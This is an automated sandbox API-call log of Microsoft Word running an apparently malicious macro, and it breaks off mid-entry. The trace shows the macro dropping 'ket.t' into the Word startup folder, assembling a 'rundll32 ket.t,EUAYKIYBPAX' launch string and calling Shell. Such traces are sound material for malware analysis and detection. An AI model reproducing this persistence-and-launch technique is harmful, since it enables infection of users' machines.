# Flog Txt Version 1 # Analyzer Version: 4.1.1 # Analyzer Build Date: Feb 8 2021 16:19:57 # Log Creation Date: 25.05.2021 02:42:09.947 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe" page_root = "0x43a6b000" os_pid = "0xe80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x458" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e77f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xeec Thread: id = 2 os_tid = 0xee8 Thread: id = 3 os_tid = 0xee4 Thread: id = 4 os_tid = 0xee0 Thread: id = 5 os_tid = 0xedc Thread: id = 6 os_tid = 0xed8 Thread: id = 7 os_tid = 0xed4 Thread: id = 8 os_tid = 0xed0 Thread: id = 9 os_tid = 0xecc Thread: id = 10 os_tid = 0xec8 Thread: id = 11 os_tid = 0xec4 Thread: id = 12 os_tid = 0xec0 Thread: id = 13 os_tid = 0xe84 [0090.372] DispCallFunc (pvInstance=0x6cc14c8, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x1a7e70) returned 0x0 [0090.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x664011d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1a7d80 | out: lpThreadId=0x1a7d80*=0xf4c) returned 0x840 [0090.374] PeekMessageA (in: lpMsg=0x1a7d60, hWnd=0x1034c, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x1a7d60) returned 0 [0090.375] GetActiveWindow () returned 0x10312 [0090.375] CRetailMalloc_Alloc () returned 0x6d09f38 [0090.375] CRetailMalloc_Realloc () returned 0x6bfcee0 [0090.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f2752, cbMultiByte=14, lpWideCharStr=0x1a7544, cchWideChar=15 | out: lpWideCharStr="wdStartupPath") returned 14 [0090.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362732, cbMultiByte=14, lpWideCharStr=0x1a75a4, cchWideChar=15 | out: lpWideCharStr="wdStartupPath") returned 14 [0090.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362732, cbMultiByte=14, lpWideCharStr=0x1a75a4, cchWideChar=15 | out: lpWideCharStr="wdStartupPath") returned 14 [0090.390] CRetailMalloc_Realloc () returned 0x6b6eb30 [0090.390] CRetailMalloc_Realloc () returned 0x6cc4968 [0090.390] realloc (_Block=0x0, _Size=0x100) returned 0xfdf9c8 [0090.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f277e, cbMultiByte=8, lpWideCharStr=0x1a7544, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0090.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33626e2, cbMultiByte=8, lpWideCharStr=0x1a75a4, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0090.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33626e2, cbMultiByte=8, lpWideCharStr=0x1a75a4, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0090.396] CRetailMalloc_Realloc () returned 0x6c8da60 [0090.396] CRetailMalloc_Realloc () returned 0x6bb6b70 [0090.396] CRetailMalloc_Realloc () returned 0x6ba1620 [0090.397] CRetailMalloc_Realloc () returned 0x6ba1728 [0090.399] CRetailMalloc_Alloc () returned 0x6bb6c90 [0090.400] CRetailMalloc_Realloc () returned 0x6cc1530 [0090.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33626e2, cbMultiByte=8, lpWideCharStr=0x1a7564, cchWideChar=9 | out: lpWideCharStr="Options") returned 8 [0090.400] CRetailMalloc_Realloc () returned 0x5c3e6b8 [0090.401] CRetailMalloc_Realloc () returned 0x6bb6068 [0090.402] CRetailMalloc_Realloc () returned 0x6c50800 [0090.402] CRetailMalloc_Alloc () returned 0x6bb8400 [0090.402] CRetailMalloc_Realloc () returned 0x6cc49c0 [0090.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362706, cbMultiByte=16, lpWideCharStr=0x1a757c, cchWideChar=17 | out: lpWideCharStr="DefaultFilePath") returned 16 [0090.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20ce8, cbMultiByte=6, lpWideCharStr=0x375076c, cchWideChar=14 | out: lpWideCharStr="\\ket.t") returned 6 [0090.404] CRetailMalloc_Realloc () returned 0x6bb6290 [0090.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f08be, cbMultiByte=4, lpWideCharStr=0x1a7544, cchWideChar=5 | out: lpWideCharStr="Dir") returned 4 [0090.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33608be, cbMultiByte=4, lpWideCharStr=0x1a75a4, cchWideChar=5 | out: lpWideCharStr="Dir") returned 4 [0090.406] CRetailMalloc_Realloc () returned 0x6d0a748 [0090.407] CRetailMalloc_Realloc () returned 0x5c3e6b8 [0090.407] CRetailMalloc_Realloc () returned 0x6c88688 [0090.407] CRetailMalloc_Realloc () returned 0x6c74a90 [0090.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20cfa, cbMultiByte=0, lpWideCharStr=0x3750a2e, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0090.407] realloc (_Block=0x0, _Size=0x60) returned 0xfdfad0 [0090.407] CRetailMalloc_Alloc () returned 0x6bdb6e0 [0090.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d18, cbMultiByte=0, lpWideCharStr=0x37510c0, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0090.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d3c, cbMultiByte=4, lpWideCharStr=0x37511b6, cchWideChar=10 | out: lpWideCharStr=".exe") returned 4 [0090.408] CRetailMalloc_Alloc () returned 0x6cedfd0 [0090.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d6c, cbMultiByte=6, lpWideCharStr=0x3751a78, cchWideChar=14 | out: lpWideCharStr="\\ket.t") returned 6 [0090.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d7c, cbMultiByte=8, lpWideCharStr=0x3751d9e, cchWideChar=18 | out: lpWideCharStr="rundll32") returned 8 [0090.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d8e, cbMultiByte=1, lpWideCharStr=0x3751e80, cchWideChar=4 | out: lpWideCharStr=" ") returned 1 [0090.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20da6, cbMultiByte=18, lpWideCharStr=0x37525b8, cchWideChar=38 | out: lpWideCharStr="\\ket.t,EUAYKIYBPAX") returned 18 [0090.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f27a2, cbMultiByte=6, lpWideCharStr=0x1a7544, cchWideChar=7 | out: lpWideCharStr="Shell") returned 6 [0090.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33627de, cbMultiByte=6, lpWideCharStr=0x1a75a4, cchWideChar=7 | out: lpWideCharStr="Shell") returned 6 [0090.414] CRetailMalloc_Realloc () returned 0x6b6eb30 [0090.414] CRetailMalloc_Realloc () returned 0x6cc4968 [0090.415] CRetailMalloc_Realloc () returned 0x6cee1f8 [0090.415] CRetailMalloc_Alloc () returned 0x6d0ab50 [0090.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6663ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0090.415] CRetailMalloc_Realloc () returned 0x6cee420 [0090.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6663ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0090.417] CRetailMalloc_Realloc () returned 0x6d09f38 [0090.417] CRetailMalloc_Free () returned 0x15a0001 [0090.417] GetCurrentProcess () returned 0xffffffff [0090.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d94, dwSize=0x14) returned 1 [0090.417] VirtualProtect (in: lpAddress=0x6bb4d94, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a746c | out: lpflOldProtect=0x1a746c*=0x40) returned 1 [0090.418] GetCurrentProcess () returned 0xffffffff [0090.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d95, dwSize=0x2) returned 1 [0090.418] GetCurrentProcess () returned 0xffffffff [0090.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db4, dwSize=0x14) returned 1 [0090.418] VirtualProtect (in: lpAddress=0x6bb4db4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a746c | out: lpflOldProtect=0x1a746c*=0x40) returned 1 [0090.418] GetCurrentProcess () returned 0xffffffff [0090.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db5, dwSize=0x2) returned 1 [0090.418] GetCurrentProcess () returned 0xffffffff [0090.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd4, dwSize=0x14) returned 1 [0090.418] VirtualProtect (in: lpAddress=0x6bb4dd4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a746c | out: lpflOldProtect=0x1a746c*=0x40) returned 1 [0090.419] GetCurrentProcess () returned 0xffffffff [0090.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd5, dwSize=0x2) returned 1 [0090.419] GetCurrentProcess () returned 0xffffffff [0090.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df4, dwSize=0x14) returned 1 [0090.419] VirtualProtect (in: lpAddress=0x6bb4df4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a746c | out: lpflOldProtect=0x1a746c*=0x40) returned 1 [0090.419] GetCurrentProcess () returned 0xffffffff [0090.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df5, dwSize=0x2) returned 1 [0090.419] SetErrorMode (uMode=0x8001) returned 0x8001 [0090.421] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0090.421] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66400000 [0090.425] SetErrorMode (uMode=0x8001) returned 0x8001 [0090.426] GetProcAddress (hModule=0x66400000, lpProcName=0x285) returned 0x66435599 [0090.426] SetErrorMode (uMode=0x8001) returned 0x8001 [0090.426] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0090.426] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66400000 [0090.426] SetErrorMode (uMode=0x8001) returned 0x8001 [0090.426] GetProcAddress (hModule=0x66400000, lpProcName=0x258) returned 0x66458346 [0090.427] GetAsyncKeyState (vKey=3) returned 0 [0090.444] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup", bstrRight="\\ket.t", pbstrResult=0x1a7d4c | out: pbstrResult=0x1a7d4c) returned 0x0 [0090.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", cchWideChar=-1, lpMultiByteStr=0x1a7790, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", lpUsedDefaultChar=0x0) returned 64 [0090.444] _fullpath (in: _FullPath=0x1a7b1c, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t" [0090.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", cchWideChar=-1, lpMultiByteStr=0x1a7c24, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", lpUsedDefaultChar=0x0) returned 64 [0090.448] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\word\\startup\\ket.t", _FindData=0x1a78fc | out: _FindData=0x1a78fc) returned 0xffffffff [0090.448] _errno () returned 0xfd07d8 [0090.450] GetUserDefaultLCID () returned 0x409 [0090.450] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x409, dwFlags=0x30001) returned 0x1 [0090.451] CRetailMalloc_Realloc () returned 0x6d0b3b8 [0090.451] CRetailMalloc_Alloc () returned 0x6d0bbc0 [0090.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f27c6, cbMultiByte=7, lpWideCharStr=0x1a7464, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0090.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x336293a, cbMultiByte=7, lpWideCharStr=0x1a74c4, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0090.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x336293a, cbMultiByte=7, lpWideCharStr=0x1a74c4, cchWideChar=8 | out: lpWideCharStr="wdLine") returned 7 [0090.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f27ea, cbMultiByte=10, lpWideCharStr=0x1a7464, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0090.453] CRetailMalloc_Realloc () returned 0x6d08700 [0090.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33628c6, cbMultiByte=10, lpWideCharStr=0x1a74c4, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0090.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33628c6, cbMultiByte=10, lpWideCharStr=0x1a74c4, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0090.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33628c6, cbMultiByte=10, lpWideCharStr=0x1a7484, cchWideChar=11 | out: lpWideCharStr="Selection") returned 10 [0090.455] CRetailMalloc_Alloc () returned 0x6bb8520 [0090.455] CRetailMalloc_Realloc () returned 0x6bd24a0 [0090.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33628ee, cbMultiByte=9, lpWideCharStr=0x1a749c, cchWideChar=10 | out: lpWideCharStr="MoveDown") returned 9 [0090.456] CRetailMalloc_Realloc () returned 0x6d0c3d0 [0090.456] CRetailMalloc_Alloc () returned 0x6b66218 [0090.457] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x5, _Src=0x3362916 | out: _Dst=0x6b66218) returned 0x0 [0090.457] SysStringByteLen (bstr="Unit") returned 0x8 [0090.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit \x03u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.457] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0090.457] CRetailMalloc_Free () returned 0x1ec0001 [0090.457] CRetailMalloc_Alloc () returned 0x6b66218 [0090.457] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x6, _Src=0x336295e | out: _Dst=0x6b66218) returned 0x0 [0090.457] SysStringByteLen (bstr="Unit") returned 0x8 [0090.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit \x03u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.457] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0090.457] SysStringByteLen (bstr="Count") returned 0xa [0090.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x1a73c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄEfäs\x1a", lpUsedDefaultChar=0x0) returned 5 [0090.457] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0090.457] CRetailMalloc_Free () returned 0x1ec0001 [0090.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f2812, cbMultiByte=12, lpWideCharStr=0x1a7464, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0090.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33629aa, cbMultiByte=12, lpWideCharStr=0x1a74c4, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0090.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33629aa, cbMultiByte=12, lpWideCharStr=0x1a74c4, cchWideChar=13 | out: lpWideCharStr="wdCharacter") returned 12 [0090.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362982, cbMultiByte=10, lpWideCharStr=0x1a749c, cchWideChar=11 | out: lpWideCharStr="MoveRight") returned 10 [0090.460] CRetailMalloc_Alloc () returned 0x6b66218 [0090.460] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x5, _Src=0x3362916 | out: _Dst=0x6b66218) returned 0x0 [0090.460] SysStringByteLen (bstr="Unit") returned 0x8 [0090.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit@\x10u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.460] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0090.461] CRetailMalloc_Free () returned 0x1ec0001 [0090.461] CRetailMalloc_Alloc () returned 0x6b66218 [0090.461] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x6, _Src=0x336295e | out: _Dst=0x6b66218) returned 0x0 [0090.461] SysStringByteLen (bstr="Unit") returned 0x8 [0090.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit@\x10u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.461] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0090.461] SysStringByteLen (bstr="Count") returned 0xa [0090.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x1a73c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄEfäs\x1a", lpUsedDefaultChar=0x0) returned 5 [0090.461] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0090.461] CRetailMalloc_Free () returned 0x1ec0001 [0090.463] CRetailMalloc_Alloc () returned 0x6b66218 [0090.463] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x5, _Src=0x3362916 | out: _Dst=0x6b66218) returned 0x0 [0090.463] SysStringByteLen (bstr="Unit") returned 0x8 [0090.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unità\x1cu\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.463] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0090.463] CRetailMalloc_Free () returned 0x1ec0001 [0090.463] CRetailMalloc_Alloc () returned 0x6b66218 [0090.463] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x6, _Src=0x336295e | out: _Dst=0x6b66218) returned 0x0 [0090.463] SysStringByteLen (bstr="Unit") returned 0x8 [0090.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unità\x1cu\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.463] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0090.463] SysStringByteLen (bstr="Count") returned 0xa [0090.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x1a73c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄEfäs\x1a", lpUsedDefaultChar=0x0) returned 5 [0090.463] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0090.463] CRetailMalloc_Free () returned 0x1ec0001 [0090.465] CRetailMalloc_Alloc () returned 0x6b66218 [0090.465] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x5, _Src=0x3362916 | out: _Dst=0x6b66218) returned 0x0 [0090.465] SysStringByteLen (bstr="Unit") returned 0x8 [0090.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit\x80)u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.465] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0090.465] CRetailMalloc_Free () returned 0x1ec0001 [0090.465] CRetailMalloc_Alloc () returned 0x6b66218 [0090.465] _mbscpy_s (in: _Dst=0x6b66218, _DstSizeInBytes=0x6, _Src=0x336295e | out: _Dst=0x6b66218) returned 0x0 [0090.465] SysStringByteLen (bstr="Unit") returned 0x8 [0090.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x1a73c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit\x80)u\x03äs\x1a", lpUsedDefaultChar=0x0) returned 4 [0090.466] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0090.466] SysStringByteLen (bstr="Count") returned 0xa [0090.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x1a73c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄEfäs\x1a", lpUsedDefaultChar=0x0) returned 5 [0090.466] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0090.466] CRetailMalloc_Free () returned 0x1ec0001 [0090.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33629d2, cbMultiByte=14, lpWideCharStr=0x1a749c, cchWideChar=15 | out: lpWideCharStr="TypeBackspace") returned 14 [0090.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33629fe, cbMultiByte=5, lpWideCharStr=0x1a749c, cchWideChar=6 | out: lpWideCharStr="Copy") returned 5 [0090.471] CRetailMalloc_Realloc () returned 0x6d0bbc0 [0090.471] CRetailMalloc_Free () returned 0xda0001 [0090.471] GetCurrentProcess () returned 0xffffffff [0090.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d94, dwSize=0x14) returned 1 [0090.471] VirtualProtect (in: lpAddress=0x6bb4d94, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0090.472] GetCurrentProcess () returned 0xffffffff [0090.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4d95, dwSize=0x2) returned 1 [0090.472] GetCurrentProcess () returned 0xffffffff [0090.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db4, dwSize=0x14) returned 1 [0090.472] VirtualProtect (in: lpAddress=0x6bb4db4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0090.472] GetCurrentProcess () returned 0xffffffff [0090.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4db5, dwSize=0x2) returned 1 [0090.472] GetCurrentProcess () returned 0xffffffff [0090.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd4, dwSize=0x14) returned 1 [0090.472] VirtualProtect (in: lpAddress=0x6bb4dd4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0090.473] GetCurrentProcess () returned 0xffffffff [0090.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4dd5, dwSize=0x2) returned 1 [0090.473] GetCurrentProcess () returned 0xffffffff [0090.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df4, dwSize=0x14) returned 1 [0090.473] VirtualProtect (in: lpAddress=0x6bb4df4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1a738c | out: lpflOldProtect=0x1a738c*=0x40) returned 1 [0090.473] GetCurrentProcess () returned 0xffffffff [0090.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6bb4df5, dwSize=0x2) returned 1 [0090.474] GetAsyncKeyState (vKey=3) returned 0 [0090.671] GetAsyncKeyState (vKey=3) returned 0 [0106.642] GetAsyncKeyState (vKey=3) returned 0 [0132.672] GetAsyncKeyState (vKey=3) returned 0 [0132.672] CRetailMalloc_Alloc () returned 0x6e87f10 [0132.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20df6, cbMultiByte=26, lpWideCharStr=0x375007c, cchWideChar=54 | out: lpWideCharStr="Scripting.FileSystemObject") returned 26 [0132.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36f283a, cbMultiByte=13, lpWideCharStr=0x1a7464, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0132.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3362822, cbMultiByte=13, lpWideCharStr=0x1a74c4, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13 [0132.675] 